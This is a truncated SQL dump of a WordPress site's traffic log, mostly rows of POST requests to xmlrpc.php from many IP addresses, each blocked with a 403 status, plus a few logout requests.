Firefox\\/59.0\"}','DJBGpVgieUz1qWLKc47jStu3',0,1681305502.1159,566,'','POST',403,0,515,0,1,'',0),('47.242.33.63',804397375,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','scBUxw0gSyb4QN37EqKuoVFG',0,1681305505.0064,605,'','POST',403,0,515,0,1,'',0),('199.167.147.66',3349648194,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','1gQ2B5ctaIFd7W6seOiwUlEH',0,1681305494.7555,648,'','POST',403,0,515,0,1,'',0),('194.0.200.15',3254831119,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','mz2jq5tJI4AYbuG6PQHTrWdc',0,1681305493.7148,563,'','POST',403,0,515,0,1,'',0),('81.223.232.24',1373628440,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','LMReImjXsiP7c4nvxNCZqb5p',0,1681305487.8155,577,'','POST',403,0,515,0,1,'',0),('116.202.233.238',1959455214,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','wPcz34SBAKXQrnyLYIJVmuvW',0,1681305486.2170,709,'','POST',403,0,515,0,1,'',0),('142.93.223.16',2388516624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','0endD5IVLpFJila31yHwhoXP',0,1681308975.2021,599,'','POST',403,0,515,0,1,'',0),('103.255.237.2',1744825602,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','5bYKI3OUxG9ak27fSr4doWqD',0,1681308971.6756,578,'','POST',403,0,515,0,1,'',0),('95.216.93.102',1608015206,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','uwHgzdt8bTPSn9cyBR6KUsLG',0,1681308954.3595,1920,'','POST',403,0,515,0,1,'',0),('45.130.104.194',763521218,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','gGbhCOoSYT4xk5w89XaejfNK',0,1681308947.9769,624,'','POST',403,0,515,0,1,'',0),('213.32.106.122',3575671418,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','jfLD1tl32iQO8bHmhrWuxEJ6',0,1681308943.9197,3749,'','POST',403,0,515,0,1,'',0),('148.72.210.101',2487800421,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','n7kLqgaePtTE6BxvN1dFIsHj',0,1681308945.5009,1535,'','POST',403,0,515,0,1,'',0),('104.215.82.71',1758941767,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','sNWT1FDhKbUIvyad3fmklxuQ',0,1681313657.5671,2878,'','POST',403,0,515,0,1,'',0),('185.221.182.129',3118315137,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','MS0Idn1KqRxTOZyDge2LEuco',0,1681313646.7359,561,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','zEcIyKQ2MphZCx3AdY1uFHvL',0,1681313645.9387,629,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','9GeO0NMXuFBdVnDS4UQzIx3L',0,1681313642.9892,689,'','POST',403,0,515,0,1,'',0),('144.24.100.136',2417517704,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','0RtFOvamS8MDV14Y3X2cL5s6',0,1681313638.4556,1429,'','POST',403,0,515,0,1,'',0),('67.198.116.43',1137079339,'','http://cmdev-site1.com/the-wild-hunt/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\",\"2\":\"http:\\/\\/cmdev-site1.com\\/the-wild-hunt\\/?loggedout=true\"}','AWbB1mHj2ivtn9Gue4RgrMEa',3,1681312613.0023,450,'','POST',302,0,600,0,1,'',510),('67.198.116.43',1137079339,'','http://cmdev-site1.com/the-wild-hunt/?action=logout&_wpnonce=48c14b40bc','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\",\"2\":\"http:\\/\\/cmdev-site1.com\\/the-wild-hunt\\/?action=logout&_wpnonce=c4d88c5fa5\"}','VTrzUWNuSibnkdEma0xFs7vc',3,1681312608.7693,416,'','GET',302,0,600,0,1,'',510),('108.170.11.42',1823083306,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','gKb0YJxSmpqWTFznv9sPQuyl',0,1681323865.1467,609,'','POST',403,0,515,0,1,'',0),('192.114.164.226',3228738786,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','LveKCqJozAjWpS1hVtX6is5G',0,1681323857.6173,597,'','POST',403,0,515,0,1,'',0),('67.205.178.151',1137554071,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','lt2uKcP16UFdIYyBS70siC3f',0,1681323849.3798,582,'','POST',403,0,515,0,1,'',0),('200.58.112.226',3359273186,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','XxhRMPcoEauJBj9WOf16Clpe',0,1681323835.4673,671,'','POST',403,0,515,0,1,'',0),('195.30.84.40',3273544744,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','g7zXjlTLMYkv48QfeDwiPJK0',0,1681323839.5418,1009,'','POST',403,0,515,0,1,'',0),('168.119.136.101',2826405989,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','K0qSRcdMEGyj1rpAYePxUQsX',0,1681323834.8120,661,'','POST',403,0,515,0,1,'',0),('198.71.235.60',3326602044,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','14bRoN2KI3PF5SE0hwUk7BMt',0,1681323830.1450,4294,'','POST',403,0,515,0,1,'',0),('178.159.49.228',2996777444,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','ph4qFJ2mBGeNPOt7gHKIRC8A',0,1681321632.8283,579,'','POST',403,0,515,0,1,'',0),('91.204.46.124',1540107900,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','AmegQIcnfu6dhp20bBszHYyT',0,1681321625.1926,571,'','POST',403,0,515,0,1,'',0),('91.107.196.183',1533789367,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','kFopd1C7b4GrxjKw6n5sW3aU',0,1681321615.4806,635,'','POST',403,0,515,0,1,'',0),('141.94.87.67',2371770179,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','j2yDz7gTsCrnpAdNYGWxboQ5',0,1681321602.2937,605,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','jEKSmvQGVXNxchpsTRW7M3wa',0,1681321589.6432,1214,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','vktg8bSfHz0qh35xTmZYMCBp',0,1681321589.3164,1333,'','POST',403,0,515,0,1,'',0),('69.16.227.57',1158734649,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','Ubc4GHdDWS9N0uFQlI8xhABZ',0,1681321580.8808,570,'','POST',403,0,515,0,1,'',0),('192.64.117.87',3225449815,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','0yw9bVWI6mP3kR2JBqFMQZ7o',0,1681321576.5539,4166,'','POST',403,0,515,0,1,'',0),('192.241.166.226',3237062370,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','ClOriSnzeosyX0jRfuFEgL9k',0,1681327119.2146,572,'','POST',403,0,515,0,1,'',0),('162.240.222.21',2733694485,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','bSDXC9U6v2e0J1OPIBohulyt',0,1681327104.1568,574,'','POST',403,0,515,0,1,'',0),('199.16.130.127',3339747967,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','yB56YAL2zlwexs9EPm3oiuN8',0,1681327114.3487,586,'','POST',403,0,515,0,1,'',0),('159.65.152.207',2671876303,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','boVxPzKZCG0ymFJMAqEHaWfp',0,1681327101.0274,567,'','POST',403,0,515,0,1,'',0),('162.240.222.21',2733694485,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','oAMIuemz7LaX9b1t0EKwCDxY',0,1681327097.6581,613,'','POST',403,0,515,0,1,'',0),('198.71.235.60',3326602044,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','sdATYaMhbpP4XzrN2c59qe8D',0,1681327093.9096,563,'','POST',403,0,515,0,1,'',0),('173.201.191.100',2915680100,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','S6GlOytiTf2V0gQr9xmwzAJh',0,1681327095.6883,552,'','POST',403,0,515,0,1,'',0),('45.130.104.194',763521218,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','XPcOhZ7Vn0Kz5p9ASRdNQTiU',0,1681327087.2942,4012,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','YQ28dPFnKwLmZJIxu1vkRoV6',0,1681337127.8496,590,'','POST',403,0,515,0,1,'',0),('103.141.97.148',1737318804,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','ZBD2cISQVi4Nsw8R1tjKp7P5',0,1681337093.3781,1806,'','POST',403,0,515,0,1,'',0),('78.46.136.94',1311672414,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','We3zlxyUCuwPpNDcMSObfko9',0,1681333537.7655,597,'','POST',403,0,515,0,1,'',0),('91.107.196.183',1533789367,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','M1nNkwst93J0DIRV6CAZrEU7',0,1681333533.2368,597,'','POST',403,0,515,0,1,'',0),('3.220.31.73',64757577,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','furZETO5mJ9xtYNq8dCl2i1w',0,1681333528.7742,589,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','Q6yaJqNRkm2c1riWuZnEBgLv',0,1681333520.7506,1605,'','POST',403,0,515,0,1,'',0),('157.245.147.60',2650116924,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','N8InRTaQlzyk0EirLvuGcVeh',0,1681333524.4721,1286,'','POST',403,0,515,0,1,'',0),('45.77.11.71',760023879,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','m50lhJqnkw847ARyKNstdefo',0,1681333511.0241,2749,'','POST',403,0,515,0,1,'',0),('68.178.145.141',1152553357,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','qps5cWOx7CuLQb46owkiArMK',0,1681333494.8493,1094,'','POST',403,0,515,0,1,'',0),('3.231.146.243',65508083,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','s9dTuG6ycY5n4tWDNjeBKfFg',0,1681333493.6532,1791,'','POST',403,0,515,0,1,'',0),('81.223.232.24',1373628440,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','48vdJsNthre2WmlPuFcxSMw1',0,1681333479.7746,3613,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','od8kqDsUiSZgz5Pwc7F4aeJv',0,1681337126.6573,583,'','POST',403,0,515,0,1,'',0),('118.31.54.127',1981757055,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','vVKzR573goQPuWr18t6IkawT',0,1681337108.1658,1136,'','POST',403,0,515,0,1,'',0),('136.243.5.53',2297627957,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','qNaifREm3BKHUtgZVukP79re',0,1681337107.8537,1219,'','POST',403,0,515,0,1,'',0),('103.124.94.44',1736203820,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','v32u4wWtnP7qBGJRZOjibeQF',0,1681337105.5628,746,'','POST',403,0,515,0,1,'',0),('150.95.114.237',2522837741,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','WDGkMUcurIVhixOPoZf683N9',0,1681337091.8093,3984,'','POST',403,0,515,0,1,'',0),('210.65.139.75',3527510859,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','l2W0kvBwegySTp8FLNHxQGJs',0,1681341050.8922,561,'','POST',403,0,515,0,1,'',0),('193.123.87.139',3246086027,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','lTyZm6G04O8nFpPMKvwtBAhe',0,1681341050.1683,557,'','POST',403,0,515,0,1,'',0),('172.104.50.233',2892509929,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','R1Vy5qTfis0OMZazdIwXNB26',0,1681341047.2907,600,'','POST',403,0,515,0,1,'',0),('91.204.46.91',1540107867,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','fEBOAhG2PwqpM4vSc6zyjmNX',0,1681341039.1580,617,'','POST',403,0,515,0,1,'',0),('68.178.145.141',1152553357,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','pVWTQrv7sC10ohjeNXFYmSAL',0,1681341038.0022,547,'','POST',403,0,515,0,1,'',0),('91.204.46.91',1540107867,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','4cOItlKgPjUn9uANXSLpzwmv',0,1681341028.5790,4282,'','POST',403,0,515,0,1,'',0),('185.119.88.55',3111606327,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','pIDhFnqtveV9UskYxyrOulfQ',0,1681340693.2452,841,'','POST',403,0,515,0,1,'',0),('185.182.56.188',3115727036,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','Sxk5a7nJEiYvesdqj932Wbl8',0,1681340691.3729,2206,'','POST',403,0,515,0,1,'',0),('178.210.67.162',3000124322,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','DZbf9Xse8dJLtaMHuGkCzBjE',0,1681340687.1596,696,'','POST',403,0,515,0,1,'',0),('157.90.169.39',2639964455,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','qzA9fZMj8ktBEWT4RHXQ6hIP',0,1681340685.9223,868,'','POST',403,0,515,0,1,'',0),('184.168.98.87',3098042967,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','1vRxecfYj8Fw5SP9uysNAK7a',0,1681340677.6790,908,'','POST',403,0,515,0,1,'',0),('85.236.153.74',1441569098,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','IYfCgW28bOBGkjFev9sPnRtz',0,1681340675.1568,1239,'','POST',403,0,515,0,1,'',0),('156.38.151.68',2619774788,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','PaSJf8o9ClUOuQEptIqsVXr5',0,1681340674.8870,1371,'','POST',403,0,515,0,1,'',0),('156.38.151.68',2619774788,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','he4o97Jc18lta65EyvDRjLST',0,1681340664.6105,620,'','POST',403,0,515,0,1,'',0),('146.88.234.56',2455300664,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','gawPRO73zXqMGbtZKI80QrDu',0,1681340657.6623,3538,'','POST',403,0,515,0,1,'',0),('149.129.34.43',2508268075,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','S10wgHplt73CvfYiI4DaTXrc',0,1681349057.5036,579,'','POST',403,0,515,0,1,'',0),('129.226.208.121',2179125369,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','4I7bc8s6nLSp2hJPeu9rm3fy',0,1681349052.1508,2007,'','POST',403,0,515,0,1,'',0),('116.118.51.5',1953903365,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','hovQyROXcKbPDk8jCVMfNgUu',0,1681349047.6251,3400,'','POST',403,0,515,0,1,'',0),('5.188.34.69',96215621,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','bmh4gq1wS0Zsin6BRFTtxKYU',0,1681349038.8989,614,'','POST',403,0,515,0,1,'',0),('185.2.4.108',3103917164,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','d5kqus3eDhF8m9r76zwHf4oR',0,1681349034.9311,601,'','POST',403,0,515,0,1,'',0),('91.204.46.124',1540107900,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','dwrCQFvqKWgnSJIGm7tN5oze',0,1681349029.3955,3028,'','POST',403,0,515,0,1,'',0),('195.22.19.197',3273003973,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','Jn1GC46yXNiIMohfxFSULA9l',0,1681349029.8002,2615,'','POST',403,0,515,0,1,'',0),('103.141.97.148',1737318804,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','uLomQZP1iBMvOtyEkCAYf7wR',0,1681356809.2088,1850,'','POST',403,0,515,0,1,'',0),('202.9.90.101',3389610597,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','hvDxL5XVz2br6QaZR1qNdonK',0,1681356810.0167,564,'','POST',403,0,515,0,1,'',0),('172.104.50.233',2892509929,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 